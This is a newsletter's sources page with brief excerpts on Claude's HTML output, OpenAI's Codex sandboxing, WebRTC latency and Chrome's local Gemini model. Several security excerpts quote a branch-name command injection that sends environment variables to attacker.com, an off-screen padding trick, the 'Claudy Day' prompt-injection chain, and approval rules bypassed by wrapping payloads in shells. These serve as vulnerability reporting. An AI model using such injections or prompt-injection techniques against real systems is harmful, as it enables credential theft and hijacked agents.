Wei (Jack) Sun

Claude pushes HTML at 18×, OpenAI ships Codex safety post, Curley flags WebRTC

Every URL the pipeline pulled into ranking for this issue — primary sources plus the supporting and contradicting findings each Researcher returned. Inline citations in the issue point back here.

Sources

Using Claude Code: The Unreasonable Effectiveness of HTML simonwillison.net

Thought-provoking piece by Thariq Shihipar (on the Claude Code team at Anthropic) advocating for HTML over Markdown as an output format to request from Claude. The article is crammed with interesting examples (collected on this site) and prompt suggestions like this one: “Help me review this PR by creating an HTML artifact that describes it. I’m not very familiar with the streaming/backpressure logic so focus on that. Render the actual d…”

Running Codex safely at OpenAI openai.com

How OpenAI runs Codex securely with sandboxing, approvals, network policies, and agent-native telemetry to support safe and compliant coding agent adoption.

Quoting Luke Curley simonwillison.net

WebRTC is designed to degrade and drop my prompt during poor network conditions. wtf my dude WebRTC aggressively drops audio packets to keep latency low. If you’ve ever heard distorted audio on a conference call, that’s WebRTC baybee. The idea is that conference calls depend on rapid back-and-forth, so pausing to wait for audio is unacceptable. …but as a user, I would much rather wait an extra 200ms for my slow/expensive prompt to be accurate. After all, I’m paying good money to boil the ocean,…

Chrome’s 4GB AI model isn’t new, but you’re not wrong for being confused arstechnica.com

Chrome’s 4GB local Gemini Nano download isn’t a new addition, despite renewed user confusion — the model has been quietly shipping with the browser to power on-device AI features, and Ars walks through the opaque settings users can toggle to remove it.

References

RecSys Frontier (AI Daily 2026-05-09) recsys-frontier.com

A comparison of the Cloudflare blog found that the HTML version consumed over 72,000 tokens, while the equivalent Markdown version required fewer than 4,000 — a 94.9% reduction.
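To see how the two figures in this excerpt relate to the "18×" in the headline, here is a minimal arithmetic sketch. It assumes the rounded bounds quoted above (72,000 and 4,000 tokens) rather than the exact counts, which the excerpt does not give; the function name is illustrative.

```python
def token_savings(html_tokens: int, markdown_tokens: int) -> tuple[float, float]:
    """Return (size ratio, percent reduction) when moving from HTML to Markdown."""
    ratio = html_tokens / markdown_tokens
    reduction = 100 * (1 - markdown_tokens / html_tokens)
    return ratio, reduction


# Assumption: rounded bounds from the excerpt, not the measured token counts.
ratio, reduction = token_savings(72_000, 4_000)
print(f"{ratio:.1f}x, {reduction:.1f}% reduction")
```

With the rounded bounds the reduction comes out near 94.4%, so the quoted 94.9% presumably reflects exact counts a little above 72,000 and a little below 4,000.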

Medium — Optimal Prompt Formats for LLMs (Dupree) medium.com

XML is frequently the worst performer in reasoning-heavy benchmarks. Its repetitive tag structure is token-inefficient and can cause ‘attention diffusion,’ where the model’s focus is diluted by redundant characters.

TechRadar — Claude AI vulnerabilities techradar.com

The ‘Claudy Day’ attack sequence combined an open redirect on claude.com with invisible prompt injection via URL parameters… untrusted JavaScript within an Artifact could perform silent API calls using the viewing user’s authenticated session.

ImprovingAgents — Best Nested Data Format improvingagents.com

If an LLM is asked for an ‘answer’ field before a ‘reasoning’ field… accuracy drops precipitously because the model cannot utilize its auto-regressive property to ‘think through’ the problem before committing to a result.
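The field-ordering point can be illustrated with a small sketch of a response template that places the reasoning field before the answer field. The field names and placeholder text are hypothetical and not taken from the cited post.

```python
import json


def response_template() -> str:
    """Build a JSON template whose key order puts reasoning before the answer."""
    # Python dicts keep insertion order, and json.dumps preserves it,
    # so the model is asked to emit "reasoning" first.
    template = {
        "reasoning": "<step-by-step working goes here>",
        "answer": "<final result, written after the reasoning>",
    }
    return json.dumps(template, indent=2)


print(response_template())
```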

baoyu.io translation of Shihipar thread baoyu.io

Examples include a ‘Corporate Translator’ with a Windows 95-style UI, design-system prototypes with live sliders, and PR review dashboards with color-coded diffs and margin annotations.

Tactiq — Claude system prompt analysis tactiq.io

Claude’s internal system prompt explicitly mandates Markdown for code snippets… and is trained to avoid excessive Markdown or list formatting in casual ‘chit-chat’ scenarios.

HackRead — BeyondTrust Codex token-theft disclosure hackread.com

By crafting a branch name containing backticks or semicolons—such as main; curl attacker.com/$(env | base64)—an attacker could execute arbitrary code… 94 Ideographic Space characters (U+3000) followed by || true … pushed off-screen in the Codex and ChatGPT web interfaces.
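The excerpt does not say how the vulnerable command was assembled. As a hedged illustration of the general class of bug, the sketch below assumes a branch name is interpolated into a shell string, and shows two common mitigations: an allow-list check and quoting with `shlex.quote`. The `SAFE_BRANCH` pattern and helper names are hypothetical.

```python
import re
import shlex

# Hypothetical allow-list: letters, digits, dot, underscore, slash, hyphen.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")


def is_safe_branch(name: str) -> bool:
    """Reject names containing shell metacharacters, whitespace, or a leading dash."""
    return SAFE_BRANCH.fullmatch(name) is not None and not name.startswith("-")


def quoted_checkout(branch: str) -> str:
    """Build a shell command string with the branch name quoted as a single word."""
    return "git checkout " + shlex.quote(branch)


payload = "main; curl attacker.com/$(env | base64)"
padded = "main" + "\u3000" * 94 + "|| true"

print(is_safe_branch("feature/login-v2"))  # ordinary branch name
print(is_safe_branch(payload))             # contains ';', spaces, '$('
print(is_safe_branch(padded))              # contains U+3000 padding and '|'
print(quoted_checkout(payload))
```

Passing an argument list to `subprocess.run` without `shell=True` avoids the shell entirely and is usually preferable to quoting.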

VentureBeat — ‘Six exploits broke AI coding agents’ venturebeat.com

Researchers identified a critical sandbox escape (CVE-2026-305) involving improper isolation in the JavaScript runtime, which allowed remote attackers to execute code in the user’s context.

azukiazusa.dev — Codex sandbox & agent authorization writeup azukiazusa.dev

If rules are too broad—such as auto-approving any command starting with a shell like /usr/bin/zsh—the prefix_rule becomes effectively useless, as an attacker can simply wrap malicious payloads inside the permitted prefix.
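A toy model makes the failure mode concrete. This is not Codex's implementation: it assumes a rule is simply a list of leading argv tokens, and the example commands are made up for illustration.

```python
def matches_prefix(argv: list[str], prefix: list[str]) -> bool:
    """Return True when the command's leading tokens equal the approved prefix."""
    return argv[: len(prefix)] == prefix


# Hypothetical rules: one overly broad, one narrow.
broad_rule = ["/usr/bin/zsh"]
narrow_rule = ["git", "status"]

# Hypothetical payload wrapped inside the permitted shell.
wrapped = ["/usr/bin/zsh", "-lc", "curl attacker.example | sh"]

print(matches_prefix(wrapped, broad_rule))                        # auto-approved
print(matches_prefix(wrapped, narrow_rule))                       # not approved
print(matches_prefix(["git", "status", "--short"], narrow_rule))  # approved
```

Under this model, approving a bare shell path approves anything the shell can run, which is why narrower rules that name the actual program and subcommand are safer.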

Trail of Bits — ‘Insecure credential storage plagues MCP’ blog.trailofbits.com

approximately 48-53% of reviewed MCP servers recommend or implement insecure storage methods, such as hardcoding API keys in .env or JSON configuration files… claude_desktop_config.json … has been observed to have world-readable permissions on macOS.

Cybernews — Huntress on Codex triggering EDR false positives cybernews.com

Codex’s legitimate troubleshooting actions can mimic attacker tradecraft, triggering false positives in EDR systems and complicating incident response.

GitHub issue #45994 (Codex CLI prefix_rule brittleness) github.com

prefix_rule matching often fails when commands are shell-wrapped (e.g., /bin/zsh -lc) or preceded by environment variables … results in repetitive approval prompts and overly specific rules.

Luke Curley, moq.dev (original post) moq.dev

It is impossible to even retransmit a WebRTC audio packet within a browser; we tried at Discord. The implementation is hard-coded for real-time latency or else.

Philipp Hancke, webrtcHacks (measurement post) webrtchacks.com

Median response latency of approximately 1.7 to 1.8 seconds… STUN RTTs of 60-70ms and bumps in the data suggesting packet loss

eesel.ai — Realtime API vs WebRTC eesel.ai

WebRTC (UDP) typically achieves ~150ms vs 200ms+ for WebSockets… direct client-side WebSocket connections risk leaking long-lived API keys, whereas WebRTC uses 60-second ephemeral keys

Ant Group / AntRTC, IETF 125 MoQ slides datatracker.ietf.org

Production deployment for Taobao Voice Search and Alipay AI Assistants reports smoother interactions under 30%+ packet-loss conditions and lower first-frame latency than WebRTC for cloud-rendered digital avatars

Forasoft — MoQ Streaming 2026 forasoft.com

Production-grade MoQ relays are delivering 200–300ms glass-to-glass latency… WHIP/WHEP (WebRTC-based) is more mature but up to 15x more expensive to scale than MoQ’s relay-based model

r/programming discussion on Curley’s post reddit.com

Critics from the WebRTC community, including creators of the Pion library, argue connection establishment can be reduced to significantly fewer than eight RTTs and that WebRTC remains the only robust way to handle Acoustic Echo Cancellation out of the box

© 2026 Wei (Jack) Sun · jacksunwei.me Built on Astro · hosted on Cloudflare